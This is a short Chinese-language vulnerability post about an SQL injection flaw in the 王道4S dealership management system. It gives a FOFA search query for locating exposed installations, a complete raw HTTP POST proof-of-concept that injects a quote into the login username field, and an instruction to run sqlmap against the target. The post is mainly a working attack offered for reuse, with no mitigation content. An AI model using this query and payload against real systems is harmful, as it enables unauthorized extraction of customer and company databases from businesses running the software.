漏洞描述
博士王道汽车4S企业管理系统(以下简称“王道4S系统”)是一套专门为汽车销售和维修服务企业开发的管理软件。该系统是博士德软件公司集10余年汽车行业管理软件研发经验之大成,精心打造的最新一代汽车4S企业管理解决方案。石家庄博士德软件开发有限公司王道4S管理系统存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。
漏洞复现
FOFA:
body="PixelsPerInch" && body="AxBorderStyle" && body="DropTarget"
POC
POST / HTTP/1.1
Host:
Content-Length: 1224
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Origin: http://
Referer: http:///
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ASP.NET_SessionId=vdiftn34dlensux525mjv0hb
Connection: keep-aliveScriptManager1=UpdatePanel3%7CbtnLogin&__EVENTTARGET=btnLogin&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE5OTE1NTI1NjIPZBYCZg9kFgYCAQ9kFgJmD2QWAgIBDxAPFgYeDkRhdGFWYWx1ZUZpZWxkBQhnb25nc2lubx4NRGF0YVRleHRGaWVsZAUIZ29uZ3NpbWMeC18hRGF0YUJvdW5kZ2QQFQMn5rGf5a6J5Yib5paw56eR5oqA5rG96L2m5oqA5pyv5pyN5Yqh56uZIeaxn%2BWuiei0pOWwueaxvei9puaKgOacr%2BacjeWKoeermTDlrpzlrr7otKTlsLnmsb3ovabplIDllK7mnI3liqHmnInpmZDotKPku7vlhazlj7gVAwIwMQIwMgIwMxQrAwNnZ2cWAWZkAgIPZBYCZg9kFgICAQ8QDxYGHwAFDWNhb3p1b3l1YW5feG0fAQUNY2FvenVveXVhbl94bR8CZ2QQFQoNLS3or7fpgInmi6ktLQnnjosgICDlu7oM5a6i5oi355yL5p2%2FD%2BWuh%2BmAmuS%2FoeaBr%2BWRmAblu5bkvJ8G5byg5a6BCei1lua4heemjxXmsZ%2FlronliJvmlrDnrqHnkIblkZgH546LIOW7ugnpmYjnu43lrrkVCgAJ546LICAg5bu6DOWuouaIt%2Beci%2Badvw%2FlrofpgJrkv6Hmga%2FlkZgG5buW5LyfBuW8oOWugQnotZbmuIXnpo8V5rGf5a6J5Yib5paw566h55CG5ZGYB%2BeOiyDlu7oJ6ZmI57uN5a65FCsDCmdnZ2dnZ2dnZ2dkZAIFD2QWAmYPZBYCAgEPD2QWAh4Hb25jbGljawUwX19kb1Bvc3RCYWNrKCdidG5Mb2dpbicsJycpOyB0aGlzLmRpc2FibGVkPXRydWU7ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUMY2JEZWZhdWx0Q3p5BRFjYkJvc3NlZEJyb2FkY2FzdMlcKRIdaLab24GacxpNMElnfhnscvYaH3qVYCt53O4t&ddlGongSiMc=01&ddlUserName=&txtUserName=admin'&txtPassWord=1&cbBossedBroadcast=on&txtMACAddr=&__ASYNCPOST=true&
语法报错
sqlmap直接跑